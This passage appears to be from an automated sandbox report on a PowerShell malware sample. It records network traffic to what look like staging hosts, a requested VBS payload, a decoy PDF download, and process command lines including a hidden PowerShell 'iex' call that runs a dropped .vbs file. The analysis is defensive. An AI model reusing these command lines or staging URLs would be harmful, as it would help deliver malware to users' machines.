                                                                                        Dec 19, 2024 12:46:51.791292906 CET1.1.1.1192.168.2.100x93b3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • www.astenterprises.com.pk
                                                                                        • www.bluemaxxlaser.com

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.1049723203.175.174.69807804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 19, 2024 12:45:14.610598087 CET80OUTGET /ms/ms.vbs HTTP/1.1
                                                                                        Host: www.bluemaxxlaser.com
                                                                                        Connection: Keep-Alive
                                                                                        Dec 19, 2024 12:45:16.145333052 CET516INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 19 Dec 2024 11:45:15 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 315
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.1049718107.161.23.1504437804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-19 11:45:11 UTC127OUTGET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                        Host: www.astenterprises.com.pk
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-19 11:45:12 UTC217INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        content-type: application/pdf
                                                                                        last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 871324
                                                                                        date: Thu, 19 Dec 2024 11:45:12 GMT
                                                                                        server: LiteSpeed
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35
                                                                                        Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                                                        Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                                                        Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                                        Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                                        Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                                        Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                                        Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                                                        2024-12-19 11:45:12 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                                        Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                                        2024-12-19 11:45:13 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                                        Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                                        2024-12-19 11:45:13 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                        Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:06:44:59
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1"
                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:06:44:59
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff620390000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:06:45:01
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"
                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:06:45:13
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                        Imagebase:0x7ff64eb90000
                                                                                        File size:5'641'176 bytes
                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:06:45:14
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                        Imagebase:0x7ff63ec50000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:06:45:14
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7df220000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:06:45:14
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1660,i,3372118493204985000,18369712110352765169,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                        Imagebase:0x7ff63ec50000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Executed Functions

                                                                                          Function 00007FF7C1104F15 Relevance: 1.7, Strings: 1, Instructions: 429COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1593937062.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ff7c1100000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: A_H
                                                                                          • API String ID: 0-522415800
                                                                                          • Opcode ID: 747358daff11b478e795d42c6b8e9a4d484fc8b3e63c9b0c280c35ca7868daff
                                                                                          • Instruction ID: 8b0be7c4017d51a1020aa5df9baa4982588fa1dd6d476247a775862e73415aee
                                                                                          • Opcode Fuzzy Hash: 747358daff11b478e795d42c6b8e9a4d484fc8b3e63c9b0c280c35ca7868daff
                                                                                          • Instruction Fuzzy Hash: 92D13731D0DA898FE795EF2858555B9BBE1FF06760B9801FED04DC7193DA28AC05C3A1
                                                                                          Function 00007FF7C11021C4 Relevance: .1, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1593937062.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ff7c1100000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5e0bb3d25251d2e6afd3b15828e6159b6deba2d53ac0f42e201350c13ef6e9f3
                                                                                          • Instruction ID: 7d01e6b8f25b537d878468e90d584dad5771a6cacb339450ac31b020584c7856
                                                                                          • Opcode Fuzzy Hash: 5e0bb3d25251d2e6afd3b15828e6159b6deba2d53ac0f42e201350c13ef6e9f3
                                                                                          • Instruction Fuzzy Hash: 0121F622F0DE8A4FE395AA282855278A3D2FF45B70BE801BAC00DC7593ED6DAC458351
                                                                                          Function 00007FF7C1033BB5 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1593299543.00007FF7C1030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1030000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ff7c1030000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction ID: f74816c3f15cd79ea862fa9a15e58198f8f7d63de8464c6ab46016a4c9395051
                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction Fuzzy Hash: 5001677111CB0C4FDB58EF0CE451AA5B7E0FB95364F50056DE58AC3651D636E882CB45

                                                                                          Executed Functions

                                                                                          Function 00007FF7C110313A Relevance: .5, Instructions: 454COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1359432768.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff7c1100000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9802e1f06111abfb47f3445eb83a91afab210d60de0c798cd1b20944231ef296
                                                                                          • Instruction ID: 51b1532769a41f7a209cfb1ed2a3008c1f024c01bd8a5289a196b2da943af6d0
                                                                                          • Opcode Fuzzy Hash: 9802e1f06111abfb47f3445eb83a91afab210d60de0c798cd1b20944231ef296
                                                                                          • Instruction Fuzzy Hash: 4DD16631E1DAC94FE755EB2868951B9BBE0FF06760B6801FEC04DCB193DA6CA805C351
                                                                                          Function 00007FF7C10333B5 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1358945138.00007FF7C1030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1030000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff7c1030000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction ID: dc2b7bff0b1548f22243c26c3010356d6547b4b9d5558d1f0ac78b5835d5ebab
                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction Fuzzy Hash: CF01677111CB0C4FDB44EF0CE451AA5B7E0FB95364F50056DE58AC3651DA36E882CB45